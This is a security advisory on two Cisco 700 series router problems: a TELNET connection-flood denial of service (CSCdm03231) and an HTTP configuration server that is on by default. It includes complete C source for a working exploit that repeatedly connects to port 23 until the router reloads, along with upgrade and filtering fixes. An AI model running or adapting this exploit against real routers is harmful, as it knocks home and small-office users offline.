COMMAND
cisco
SYSTEMS AFFECTED
All versions of IOS/700 on all Cisco 700 series routers are
vulnerable. The 700 series includes all models in the 760 and 770
series including the 762M, 766M, 772M, and the 776M. All
international models in this series are also vulnerable.
PROBLEM
Following vulnerabilities were primarily researched by Dan
Ingevaldson of the ISS X-Force and the individuals at Cisco
Systems.
The first vulnerability, which has been assigned Cisco bug ID
CSCdm03231, can be used to cause system reloads, and therefore
denial of service, using TCP connections to the routers' TELNET
ports.
The second vulnerability has not been assigned a bug ID. 7xx
routers running software versions 3.2(5) through 4.2(3) support a
simple HTTP server (ClickStart). This HTTP server is enabled by
default. Unless the server is explicitly disabled, it can be
used to make changes to the router configuration, and/or to gain
information about that configuration. This is intentional
behavior, but is mentioned in this notice because it appears that
customers have been caught unawares by it.
Only networks incorporating 7xx series small-office/home-office
routers are affected by these vulnerabilities. 7xx routers are
designed to provide network connectivity for small remote networks
using ISDN BRI lines. If your network includes 7xx series routers,
they are most likely to be found in the homes of network users, or
in remote offices with no more than a few employees. CSCdm03231
affects all Cisco 7xx routers, running any software version up to
and including release 4.2(3), whose administrators have not taken
specific steps to filter incoming TCP connections. Such filtering
is not enabled by default. Routers running release 4.3(1) or later
software are not affected by CSCdm03231. The HTTP server is
present in all software releases from 3.2(5) through 4.2(3),
inclusive. The server is enabled by default in all of these
software versions.
Impact of CSCdm03231
--------------------
CSCdm03231 permits a remote attacker to force a 7xx router to
reload, denying service to the router's home or small office
user. It may sometimes be possible to degrade performance
without actually inducing a router reload. The attack
consumes relatively little bandwidth compared to
flooding-based denial of service attacks. In all cases, the
router will recover after the attack stops; the attacker must
send traffic continuously to maintain denial of service.
However, if the router has reloaded, the end user may have to
take some installation-dependent action to cause the router to
redial the ISDN connection. This vulnerability does not give
attackers access to the router CLI, nor does it give them
any other way of controlling the router beyond inducing denial
of service. Sample exploit for this vulnerability:
/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count<times;count++){
printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
Impact of the Presence of the HTTP Server
-----------------------------------------
If the HTTP server is enabled, it can be used to change the
router's configuration, or to retrieve information about that
configuration. No special tools are required.
A simple program is needed to effectively exploit CSCdm03231.
Although Cisco knows of no program available to the public
specifically for this purpose, writing such a program would
require very little effort, and only the most basic of skill.
Also, certain publicly-available programs intended for other
purposes could be used or adapted to exploit the vulnerability.
Cisco has had no reports of abuse of the HTTP server on the 7xx
series. However, the potential for abuse is discussed in the
product documentation, and must be considered to be known to
potential attackers.
SOLUTION
CSCdm03231 affects all software versions earlier than 4.3(1).
Customers with 76x or 77x routers should upgrade to release
4.3(1). Because of memory limitations, release 4.3 is not
supported on the 75x routers; customers with 75x routers should
use IP filtering as described in the "Workarounds" section. The
HTTP server is present in all software versions from 3.2(5)
through 4.2(3). It is not present in 3.2(4) or earlier releases,
nor is it present in 4.3. Customers with 76x or 77x routers should
upgrade to release 4.3(1), primarily because of the desirability
of installing the CSCdm03231 fix. The HTTP server may be disabled
in any software version; disabling the server is the recommended
course of action for customers with 75x routers. Cisco is
offering free software upgrades to remedy CSCdm03231 for all
vulnerable customers, regardless of contract status. Customers
with service contracts may upgrade to any software version,
although they may only install the feature sets they've already
purchased. Customers without contracts may upgrade to version
4.3(1).
Workaround for CSCdm03231
-------------------------
CSCdm03231 can be made much less useful to attackers by preventing
incoming TCP connections to the router from untrusted hosts. This
can be done with the set ip filter profile command, as in the
following example:
set ip filter tcp source = not trusted-host destination = router block
This example would configure the router to accept incoming TCP
connections only from a single trusted administrative host. More
elaborate configurations, permitting connections of various types
from various hosts, are possible; see the router documentation for
more information.
Disabling the HTTP Server
-------------------------
The HTTP server may be disabled with the system command
Router> set clickstart off